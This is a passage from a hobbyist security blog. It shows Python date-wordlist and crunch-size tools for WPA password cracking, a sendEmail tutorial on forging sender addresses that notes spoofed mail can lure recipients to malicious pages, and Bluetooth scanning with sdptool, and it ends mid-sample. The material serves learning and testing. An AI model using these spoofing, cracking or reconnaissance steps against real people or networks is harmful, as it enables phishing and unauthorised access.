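The same job done with Python's datetime module, as an added example that is neither the bash script earlier in this post nor the datelist tool: it covers the ddmmyyyy list, the other output formats via strftime, the -a / -p style digit suffix or prefix, and it has no 1902 -- 2037 limit because datetime handles years 1 to 9999 and does the leap-year arithmetic itself (1900 is not a leap year, 2000 is, which was the whole-century bug fixed in v0.7). The function names, the yyyy-mm-dd input convention and the output file name follow this post; nothing here is datelist's own code.

```python
"""Date-based wordlist generator (added example, not the datelist tool)."""
import itertools
from datetime import date, timedelta


def date_range(start: date, end: date):
    """Yield every calendar day from start to end inclusive, in either order."""
    if end < start:
        start, end = end, start
    d = start
    while d <= end:
        yield d
        d += timedelta(days=1)   # datetime takes care of month lengths and leap years


def date_words(start: date, end: date, fmt: str = "%d%m%Y"):
    """Render the range in the chosen format: %d%m%Y -> 01032011, %Y%m%d -> 20110301, %d%m%y -> 010311."""
    return [d.strftime(fmt) for d in date_range(start, end)]


def with_digits(words, n: int, prepend: bool = False):
    """Append (datelist -a) or prepend (datelist -p) every n-digit string 00..99.. to every word.
    Each extra digit multiplies the list by 10, so keep n small."""
    digits = ["".join(t) for t in itertools.product("0123456789", repeat=n)]
    if prepend:
        return [s + w for w in words for s in digits]
    return [w + s for w in words for s in digits]


def build_datelist(start_str: str, end_str: str, fmt: str = "%d%m%Y",
                   digits: int = 0, prepend: bool = False):
    """Parse yyyy-mm-dd bounds (a bad date raises ValueError instead of looping forever)
    and build the final list."""
    words = date_words(date.fromisoformat(start_str), date.fromisoformat(end_str), fmt)
    return with_digits(words, digits, prepend) if digits else words


if __name__ == "__main__":
    # Same result as the bash script: ddmmyyyy for one year, one per line, into datelist.txt
    wl = build_datelist("2011-01-01", "2011-12-31")
    with open("datelist.txt", "w") as fh:
        fh.write("\n".join(wl) + "\n")
    print(f"{len(wl)} lines written, first: {wl[0]}, last: {wl[-1]}")
```

A 100 year range is about 36,500 lines, so even with two appended digits (3.65 million lines) the list stays far below anything crunch would produce for 8 digit numerics, which is the reason a date list is worth building separately rather than brute-forcing.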
<br />
Again, this is all just a bit of fun and most likely ludicrously funny to anyone able to really write,<br />
but who knows it may be of use to someone ;)<br />
<br />
<div style="color: yellow;">
<b>Video showing the use of datelist (v0.3) </b></div>
<br />
<b><a href="http://blip.tv/file/4842595">http://blip.tv/file/4842595</a></b><br />
or<br />
<b><a href="http://www.youtube.com/watch?v=FEXbxbjh-eU">http://www.youtube.com/watch?v=FEXbxbjh-eU</a></b><br />
<br />
Don't be shy about commenting if it's any help or simply worthless :D</div>Unknownnoreply@blogger.com46tag:blogger.com,1999:blog-8356530514965708840.post-12176357883102108112011-02-15T16:13:00.002+01:002011-02-15T16:22:16.456+01:00sendEmail<div style="color: #6aa84f;"><u><b>FUN WITH EMAIL</b></u></div><br />
<br />
sendEmail is installed by default on the BackTrack OS, and the options can simply be checked by typing ;<br />
<br />
<div style="color: lime;">sendEmail</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="353" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail01.jpg" width="640" /></a></div><br />
<br />
Make sure your ISP does not have any problems with the use of sendEmail prior to sending loads of mails<br />
to your roomate from MeganFox@movieworld.com .. <br />
<br />
This is by no means an anonymous emailing method, there will always be IP address details mentioned in the email headers and you need to specify the smtp server to use.<br />
You can specify to use the smtp server of the connection you have in place, or you can specify to use for instance the gmail smtp server.<br />
When using the gmail smtp server however, the gmail address will be seen as the <b>reply </b>address.<br />
<br />
<br />
Also, it is quite likely that some of the messages made such as the below examples will be picked up as spam..<br />
YMMV depending on how often you test on certain addresses.<br />
<br />
<br />
In any case, for an unsuspecting, not too savvy recipient, it can lure them to malicious web pages or entice them to open attachments etc.<br />
<br />
<div style="color: #6aa84f;"><u><b>SENDING BASIC EMAIL</b></u></div><br />
So lets start off by creating a simple message, sending it to my gmail account using my ISP's smtp server; <br />
(do a google on <b>smtp servers</b> to find the one your ISP is using) <br />
<br />
<span style="color: lime;">-f</span> From (sender) email address<br />
<span style="color: lime;">-t</span> To email address<br />
<span style="color: lime;">-u</span> Subject (in quotes)<br />
<span style="color: lime;">-m</span> Message body<br />
<span style="color: lime;">-s</span> smtp server<br />
<br />
I will separate the commands partially using backslash <span style="color: lime;">\</span> as I get confused with long lines :) <br />
<br />
It is important to note that some special characters such as an exclamation mark, can cause problems in the subject line / message line depending on single or double quotes used.<br />
<br />
<div style="color: lime;">sendEmail -f megan.fox@movieworld.com -t MyEmail@gmail.com \<br />
-u "Enjoyed meeting you at the party good-looking ;)" \<br />
-m "We sure had a good time didnt we, cant wait to see you again .. " \<br />
-s smtp.isp</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="294" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail02.jpg" width="640" /></a></div><br />
<br />
As received in gmail (this one got caught as being spam as I had tested it a few times in quick succession) ;<br />
<br />
<div class="separator" style="clear: both; text-align: center;"> <a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail03.jpg" /></a></div><br />
<br />
Now my better half would never believe that I actually met Megan Fox at a party or that she was so thunderstruck by my charming self she thought it necessary to email me..<br />
But hey, you get the idea ;) <br />
<br />
<br />
<div style="color: #6aa84f;"><u><b>USING STDIN FOR MESSAGE INPUT</b></u></div><br />
If you want to write a bit more in the email body, simply leave out the -m option and sendEmail will read the body from STDIN; after entering the command you will be prompted for the message, which you end with Ctrl+D<br />
(on its own line) to have it read and then sent ;<br />
Lets use an example which the better halves will appreciate a bit more, like sending an email to your wife on Valentine's Day.. yeah...what a romantic..<br />
<br />
<div style="color: lime;">sendEmail -f Secret.Admirer@secret.com -t BetterHalf@gmail.com \<br />
-u "Will you be my valentine?" \<br />
-s smtp.isp</div><br />
You will then be presented with;<br />
<i>Reading message body from STDIN because the '-m' option was not used.</i><br />
<i>If you are manually typing in a message:</i><br />
<i> - First line must be received within 60 seconds.</i><br />
<i> - End manual input with a CTRL-D on its own line.</i><br />
<br />
So type the desired message and, when finished, make sure you hit Enter to get to a blank line, then<br />
hit Ctrl+D ; <br />
<div style="color: yellow;">Roses are Red</div><div style="color: yellow;">Violets are Blue</div><div style="color: yellow;">Sugar is Sweet</div><div style="color: yellow;">And so are You !</div><span style="color: lime;">Ctrl+D</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="294" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail04.jpg" width="640" /></a></div><br />
<br />
As received in gmail ;<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail05.jpg" /></a></div><br />
<br />
Now if that doesn't get an appreciative smile / freebie to grab another beer, then you must have really been snoring the night before..<br />
<br />
<div style="color: #6aa84f;"><br />
</div><div style="color: #6aa84f;"><u><b>SENDING EMAIL WITH MESSAGE PRE-PREPARED IN TXT FILE</b></u></div><br />
You can also prepare a written message and have sendEmail enter this as the message body ;<br />
<br />
<div style="color: lime;">nano valentine</div><br />
<div style="color: yellow;">Will you be my Valentine ?</div><div style="color: yellow;">===================</div><div style="color: yellow;">Roses are Red<br />
Violets are Blue<br />
Sugar is Sweet<br />
And So Are You !<br />
<br />
HAPPY VALENTINE'S DAY !</div><div style="color: yellow;"></div><br />
Save and Exit; <span style="color: lime;">Ctrl+X --> Y</span><br />
<br />
<div style="color: lime;">sendEmail -f secret.admirer@secret.com -t BetterHalf@gmail.com \<br />
-u "Will you be my valentine?" \<br />
-o message-file=valentine \<br />
-s smtp.isp</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="294" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail06.jpg" width="640" /></a></div><br />
<br />
As received in gmail ;<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail07.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail07.jpg" /></a></div><br />
<br />
<div style="color: #6aa84f;"><u><b>USING GMAIL'S SMTP FOR SENDING MAIL</b></u></div><br />
In order to use Gmail's SMTP server you have to authenticate, specifying your Gmail username (with -xu) and password (with -xp).<br />
<br />
An example herebelow ;<br />
<br />
<div style="color: lime;">sendEmail -f DesiredEmail@whatever.com -t YourEmail@testaccount.com \</div><div style="color: lime;">-u "Testing Gmail smtp" \</div><div style="color: lime;">-m "Just a test for the gmail smtp" \</div><div style="color: lime;">-s smtp.gmail.com \</div><div style="color: lime;">-xu your.gmail@gmail.com \</div><div style="color: lime;">-xp gmailpassword</div><br />
When sending through Gmail the sender is rewritten: the <b>return </b>address will always be your Gmail account (Gmail normally rewrites the From: header to the authenticated account as well, unless the -f address is a verified "send mail as" alias), and the sent message is also stored in the Gmail account being used. Note too that Gmail expects TLS on the submission port (<span style="color: lime;">-s smtp.gmail.com:587 -o tls=yes</span>), that accounts with 2-step verification need an app password rather than the account password, and that a password given with -xp ends up in your shell history and in the process list, so use a test account.<br />
<br />
Of course there are quite a few more options, adding cc's / bcc's, including attachments, etc etc. <br />
<br />
<br />
Just a bit of fun, but it goes to show that checking where an email actually came from is not a bad idea: the -f address is whatever the sender typed, so look at the Received headers and the SPF/DKIM results rather than the From line.<br />
<br />
<br />
Especially if they include links to sites or attachments..<br />
<br />
<b>Wordlist Sizes</b> <i>(posted 2010-09-27, updated 2010-10-22)</i><br />
The post on <a href="http://adaywithtape.blogspot.com/2010/04/creating-wordlists-with-crunch-v23.html">creating wordlists with crunch v2.4</a> receives by far the most hits on my blog and from the<br />
queries in the comments section, it would seem that not everyone realises what the potential size can be<br />
when creating wordlists.<br />
<div style="color: red;"><br />
</div><i><b style="color: red;">EDIT</b></i><br />
<div style="color: red;"><i><b>====</b></i></div><i>Check out the latest revision of crunch; bofh28 released v2.6 on 03-10-2010.</i><br />
<i>Crunch now prints a size estimate when starting the wordlist generation, so you can see how large the wordlist you are planning will be,</i><br />
<i>along with a few more nice additions.</i><br />
<i>Download the latest crunch here;</i><br />
<i><a href="http://sourceforge.net/projects/crunch-wordlist/">http://sourceforge.net/projects/crunch-wordlist/</a></i><br />
<div style="color: red;"><i>Edit</i></div><i>The latest revision of crunch is now also included in the BackTrack 4 repository.<br />
</i><br />
<br />
Let's say you are working on a wordlist for a WPA key (a WPA passphrase is always at least 8 characters long)<br />
and let's say that you know for a fact that the passkey in question is an eight-character combination of the following digits and letters;<br />
<div style="color: lime;">0123456789ABCDEF</div>(like some internet companies have on their broadband modem/routers where I am from).<br />
<br />
To create a wordlist with all possible combinations based on the passphrase having 8 characters only,<br />
you could use the following syntax in crunch;<br />
<br />
<div style="color: lime;">./crunch 8 8 0123456789ABCDEF -o wpa-list.txt</div><br />
That one line seems so simple, yet when you check the estimated size of the wordlist to be created<br />
you would definitely think twice about trying to create, save and use it...<br />
<br />
<br />
The size of the wordlist can be calculated as follows ;<br />
<br />
(x^y) * (y+1) = size in bytes<br />
x = the number of characters in the character set used to create the wordlist<br />
y = the length of the words/passphrases in the wordlist (the +1 is the newline that terminates each line). <br />
<br />
Based on the above example we have 10 possible numeric values and 6 possible alpha values,<br />
so 16 characters in total, and we want the size of a wordlist in which every passphrase has 8 characters.<br />
To calculate the size in a terminal we can use "bc" ;<br />
<br />
<div style="color: lime;">echo "(16^8)*(8+1)" | bc</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bc-konsole.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="146" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bc-konsole.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
Or we can even just type it in google; <span style="color: lime;">(16^8)*(8+1)</span><br />
and it will return the same result ;<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/google-calc.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="280" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/google-calc.jpg" width="640" /></a></div><br />
<br />
Next we can check the conversions of the resulting size in KB / MB / GB etc. ;<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/byte-conv.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/byte-conv.jpg" width="640" /></a></div><br />
<br />
That's quite a lot: 16^8 * 9 = 38,654,705,664 bytes, i.e. 36 GiB, for a single eight-character hex list...<br />
<br />
<br />
I put together a (very!) simple script in order to be able to quickly check what kind of size one<br />
is looking at when thinking of creating a wordlist with the same min/max length in crunch;<br />
<div style="color: yellow;">crunch_size</div><br />
<div style="color: red;"><b>DOWNLOAD</b></div><a href="http://www.mediafire.com/file/dmh989dhmebch43/crunch_size-v0.2">http://www.mediafire.com/file/dmh989dhmebch43/crunch_size-v0.2</a><br />
<br />
After saving to your <span style="color: lime;">/root/</span> directory for instance, just run by entering ;<br />
<br />
<div style="color: lime;">./crunch_size-v0.2</div><br />
You need to enter ;<br />
> the number of characters to be used when creating the wordlist. (using the above example; <span style="color: red;">16</span>)<br />
> the length of the words/passphrases in the wordlist. (using the above example; <span style="color: red;">8</span>)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_size1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_size1.jpg" width="640" /></a></div><br />
<br />
You can't check what the results would be with fixed patterns or variables (have to leave the hard stuff like that to the pros!), but it is still an eye-opener to see the sizes involved with a 'simple' wordlist.<br />
<br />
<br />
The result will show you the expected number of words/passphrases in the wordlist along with the estimated<br />
file size in bytes / Kilobytes / Megabytes / Gigabytes / Terabytes / Petabytes<br />
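The same estimate, written out as an added example rather than the blog's own crunch_size script: it keeps the page's (x^y) * (y+1) formula but, like crunch itself, accepts a min and max length and sums over every length in that range. It assumes one byte per character and one newline per line (what the formula on this page assumes); the unit conversion uses binary units (1 KiB = 1024 B).<br />

```python
# Added example (not the blog's crunch_size script): estimate a crunch-style
# wordlist before generating it. The page's (x^y) * (y+1) formula is the
# single-length case; crunch takes a min and max length, so the estimate
# below sums over every length in that range.

def word_count(charset_size, min_len, max_len):
    """Number of candidates for all lengths min_len..max_len."""
    if min_len < 1 or max_len < min_len or charset_size < 1:
        raise ValueError("need 1 <= min_len <= max_len and a non-empty charset")
    return sum(charset_size ** n for n in range(min_len, max_len + 1))

def byte_size(charset_size, min_len, max_len):
    """File size in bytes: x^n words of length n, each plus one newline byte."""
    if min_len < 1 or max_len < min_len or charset_size < 1:
        raise ValueError("need 1 <= min_len <= max_len and a non-empty charset")
    return sum(charset_size ** n * (n + 1) for n in range(min_len, max_len + 1))

def human_size(nbytes):
    """Render a byte count in binary units (1 KiB = 1024 B)."""
    units = ["B", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB"]
    value = float(nbytes)
    for unit in units[:-1]:
        if value < 1024:
            return f"{value:.2f} {unit}"
        value /= 1024
    return f"{value:.2f} {units[-1]}"

def estimate(charset, min_len, max_len):
    """Estimate for a charset given as a string. Duplicate characters are
    collapsed here (an assumption of this example), since a repeated
    character adds no new candidates."""
    x = len(set(charset))
    size = byte_size(x, min_len, max_len)
    return {
        "charset_size": x,
        "words": word_count(x, min_len, max_len),
        "bytes": size,
        "human": human_size(size),
    }

if __name__ == "__main__":
    import sys
    # Same argument order as crunch: <min> <max> <charset>
    if len(sys.argv) == 4:
        lo, hi, cs = int(sys.argv[1]), int(sys.argv[2]), sys.argv[3]
    else:
        lo, hi, cs = 8, 8, "0123456789ABCDEF"   # the page's WPA example
    r = estimate(cs, lo, hi)
    print(f"{r['charset_size']} characters, lengths {lo}..{hi}: "
          f"{r['words']:,} words, {r['bytes']:,} bytes ({r['human']})")
```

Run it with the page's example, <span style="color: lime;">python3 crunch_size.py 8 8 0123456789ABCDEF</span>, and it reports 4,294,967,296 words and 36.00 GiB; give it <span style="color: lime;">8 10</span> instead and the sum over lengths 8, 9 and 10 shows why a range in crunch grows so much faster than a single length.<br />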
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_size2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_size2.jpg" width="640" /></a></div><br />
<br />
Just a bit of fun and possibly handy to have in your crunch directory for reference ;)<br />
<br />
Please comment if I messed up on the calculations anywhere..<br />
<br />
<b>Bluetooth mayhem -- part III -- bluejay</b> <i>(posted 2010-09-19, updated 2011-02-02)</i><br />
<div style="color: red;"><i>UPDATE</i></div><div style="color: red;"><i>=======</i></div>Uploaded a revision to the bluejay bluetooth scanner; <br />
<span style="color: red;">Download link below</span><br />
<div style="color: blue;"></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-v03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-v03.jpg" width="640" /></a></div><br />
<br />
<b style="color: red;">VIDEO </b>of an update again ;<br />
<br />
<a href="http://blip.tv/file/4240113">http://blip.tv/file/4240113</a><br />
<br />
File download;<br />
<a href="http://www.mediafire.com/file/6eacv5yez0eyv2z/bluejay">http://www.mediafire.com/file/6eacv5yez0eyv2z/bluejay</a><br />
<br />
<br />
Regrettably, the mayhem I was able to enjoy with bluetooth has basically been limited to scanning..<br />
<br />
All in all a rather disappointing outcome after quite a bit of time spent trying to get somewhere.<br />
<br />
I have tried to get the famous bluebugger & bluesnarfer to work, however the phones I have to test on do not seem to be vulnerable to the standard attacks and the tools do not seem to be well suited to Backtrack 4 without some serious tweaking.<br />
<br />
<br />
The bluetooth headsets I got don't seem to show up on any of the scans I do, so I couldn't even test carwhisper either.<br />
Bummer...<br />
Am going to continue to pick up cheapo headsets though as I would love to at least get <i>something</i> working...<br />
<br />
<br />
There is a serious lack of information on using bluetooth tools with backtrack 4 and I had hoped to be able to contribute to getting some more information out there, however for the time being I have to admit defeat on this one...<br />
<br />
<br />
The plus side of things is that it motivated me to write my own bluetooth scanner :D<br />
<br />
Considering that tools like ghettotooth are still included in backtrack 4, I saw no harm in making something similar, may even propose for it to be included if I am feeling cocky... <br />
<br />
<br />
So after a lot of trial and error and a hell of a lot of google, my first bash script ; <b><span style="color: #0b5394;">bluejay<span style="color: yellow;"></span></span></b><br />
<br />
Hopefully someone finds it fun to use, I had a lot of fun (along with frustration...) writing it.<br />
Although I am sure many looking at the code will probably sh1t themselves laughing, its my first attempt at any bash scripting with a bit of scavenging from teh interwebz... so hey ;)<br />
<br />
<br />
bluejay was written with backtrack 4 in mind, and is untested on any other platform.<br />
<br />
<div style="color: yellow;"><br />
</div><span style="color: yellow;">INSTALLATION & RUNNING</span><br />
<div style="color: yellow;">(based on using Backtrack 4)</div><div style="color: yellow;">=========================</div><span style="color: black;"> </span><br />
1. Download file from below link to a location of your choice (for instance <span style="color: lime;">/root/</span> ).<br />
<u><b>Download link ;</b></u><br />
See download link for bluejay v0.3 at top of page.<br />
<br />
2. Make a directory called "bluejay" in /pentest/bluetooth/;<br />
<div style="color: lime;">mkdir /pentest/bluetooth/bluejay</div><div style="color: red;"><u><i></i></u></div><div style="color: red;"><u><i>Note!</i></u></div><div style="color: red;">Creating the directory <span style="color: lime;">/pentest/bluetooth/bluejay/</span> is required as bluejay puts temp files in that location.</div><i>(Latest version of bluejay will ask if you want to and create directory automatically if you choose to continue)</i><br />
<br />
3. Copy or move the file into the created directory;<br />
<span style="color: lime;">mv /root/bluejay /pentest/bluetooth/bluejay/bluejay</span><br />
<br />
4. If you can't run bluejay, you may have to make the file executable ;<br />
<span style="color: lime;">chmod 755 /pentest/bluetooth/bluejay/bluejay</span><br />
<br />
5. Then run it ! ;<br />
<div style="color: lime;">cd /pentest/bluetooth/bluejay/</div><div style="color: lime;"></div><div style="color: lime;">./bluejay -h </div><br />
<br />
<br />
<div style="color: yellow;">HELP INFORMATION</div><span style="color: yellow;">================== </span><br />
<br />
<div style="color: lime;">./bluejay -h</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-h.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-h.jpg" width="640" /></a></div><br />
<br />
<div style="color: yellow;">LISTING AVAILABLE INTERFACES</div><span style="color: yellow;">============================ </span><br />
<br />
<span style="color: lime;">./bluejay -d</span><br />
<span style="color: lime;"></span>Result of listing devices when only 1 bluetooth interface present ; <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-d-single.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-d-single.jpg" width="640" /></a></div><br />
<br />
Result of listing devices when multiple bluetooth interfaces are installed ;<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-d-m.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-d-m.jpg" width="640" /></a></div><br />
<br />
<div style="color: yellow;">SINGLE SCANS</div><div style="color: yellow;">=============</div><br />
With only 1 bluetooth interface installed, bluejay automatically chooses this interface,<br />
usually hci0, and starts the scan ;<br />
<br />
<span style="color: lime;">./bluejay -s</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-s-single.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-s-single.jpg" width="640" /></a></div><br />
<br />
When starting a single scan with multiple interfaces installed, bluejay will prompt for an interface to<br />
be entered ; <br />
<br />
<div style="color: lime;">./bluejay -s<br />
hci2<br />
<div class="separator" style="clear: both; text-align: center;"> <a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-s-m.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-s-m.jpg" width="640" /></a></div></div><br />
<br />
<div style="color: yellow;">CONTINUOUS SCANS</div><span style="color: yellow;">==================</span><br />
<br />
With only 1 bluetooth interface installed, bluejay will automatically take the first one it finds,<br />
usually hci0, and start the scan.<br />
When quitting with Ctrl C, bluejay then prompts whether to save the scan results to log or not (y/n) <br />
<br />
If choosing not to save, number of found devices is printed to screen and program exits.<br />
<br />
<div style="color: lime;">./bluejay -c</div>(followed by <span style="color: lime;">Ctrl C</span> and "<span style="color: lime;">n</span>" to <u>not </u>save results to log)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-single-n.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-single-n.jpg" width="640" /></a></div><br />
<br />
If you choose to save the scan results, then bluejay will print the number of devices discovered on screen and<br />
save the results to a logfile in /pentest/bluetooth/bluejay/ <br />
<br />
Saving the scan results to log ;<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-single-y.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-single-y.jpg" width="640" /></a></div><br />
<br />
When starting continuous scans with multiple bluetooth interfaces installed,<br />
bluejay will prompt you to enter the bluetooth interface you want to scan with. <br />
<br />
<span style="color: lime;">./bluejay -c</span><br />
followed by entering interface <span style="color: lime;">hci1</span> in this case<br />
then Quitting with <span style="color: lime;">Ctrl C</span> and choosing <u>not </u>to save scan results "<span style="color: lime;">n</span>" <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-m.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="355" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-m.jpg" width="640" /></a></div><br />
<br />
I am lazy and got fed up with the typing in of the interface names..<br />
So if you just hit Enter where you are prompted to enter the interface to scan with, bluejay will<br />
automatically choose the first interface it finds (usually hci0) and start scanning with that.<br />
<br />
<div style="color: lime;">./bluejay -c</div><span style="color: lime;">Enter</span><br />
<span style="color: lime;"></span>Quit with <span style="color: lime;">Ctrl C</span> and "<span style="color: lime;">n</span>" to <u>not </u>save the scan results.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-m-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-c-m-1.jpg" width="640" /></a></div><br />
<br />
Le Voilà !!<br />
The logging side of things is regretfully far from perfect;<br />
if the clock offset changes, or if the name is cached, then the same BDADDR will show up more than once in the log.<br />
Am working on a revision v0.3 which will hopefully sort a few things out. It was still a fun project though ;)<br />
<br />
I am sure there are loads of ways to make it smoother and quicker, comments with advice and on errors<br />
encountered when using it are appreciated.<br />
<br />
<br />
<br />
Despite the fact that I have more or less given up hope of being able to have the same amount of fun with<br />
bluetooth as can be had with wireless, it is an interesting area to look at and I would appreciate any comments<br />
which may assist with bluetooth hacking.<br />
<br />
<b>Bluetooth mayhem -- part II</b> <i>(posted 2010-09-08, updated 2010-09-09)</i><br />
In the previous post all kinds of methods were shown to get hold of the all-important bdaddr (the Bluetooth device address, i.e. its MAC address), so here I assume that you have, or know how to obtain, the bdaddr of your test device.<br />
<br />
After all the scanning is complete and I have found my test subject... what next ?<br />
Well, as always, get more information !<br />
<br />
We can get further information on the device's services and channels by querying its SDP (Service Discovery Protocol) records with sdptool;<br />
<div style="color: lime;">sdptool -i hci0 browse 6C:9B:02:FF:97:2F</div>Hectic amount of output there... so what do we actually need ?<br />
From what I have read, we want the Service Name, the Service RecHandle and the (RFCOMM) Channel.<br />
<br />
So to trim the output down to just those fields I will use egrep (grep -E) to make it a little more readable ;<br />
<div style="color: lime;">sdptool -i hci0 browse 6C:9B:02:FF:97:2F | egrep 'Service Name|Service RecHandle|Channel'</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot07-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot07-1.jpg" width="640" /></a></div><br />
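The egrep one-liner prints the three fields but loses which Channel belongs to which Service Name once a phone exposes a dozen records. As an added example (not part of the original post), here is a small parser that keeps each record together and spits out the rfcomm bind/connect lines used further down for whichever service you pick. The sample output embedded in it is constructed in the format sdptool prints, with the handles and channels used elsewhere in this post (OPUSH 9, FTP 10, DUN 1) plus one A2DP record that has no RFCOMM channel at all; the script name sdp_services.py is just a suggestion.<br />

```python
# Added example (not from the original post): parse "sdptool browse <bdaddr>"
# output into one record per service, keeping Service Name, RecHandle and
# RFCOMM Channel together, and build the rfcomm commands for a chosen service.
import re
import sys

# Constructed sample in the layout sdptool prints. Handles/channels match the
# ones used in this post; the last record (A2DP) runs over L2CAP only, so it
# has a PSM but no RFCOMM channel.
SAMPLE = """\
Browsing 6C:9B:02:FF:97:2F ...
Service Name: OBEX Object Push
Service RecHandle: 0x10001
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
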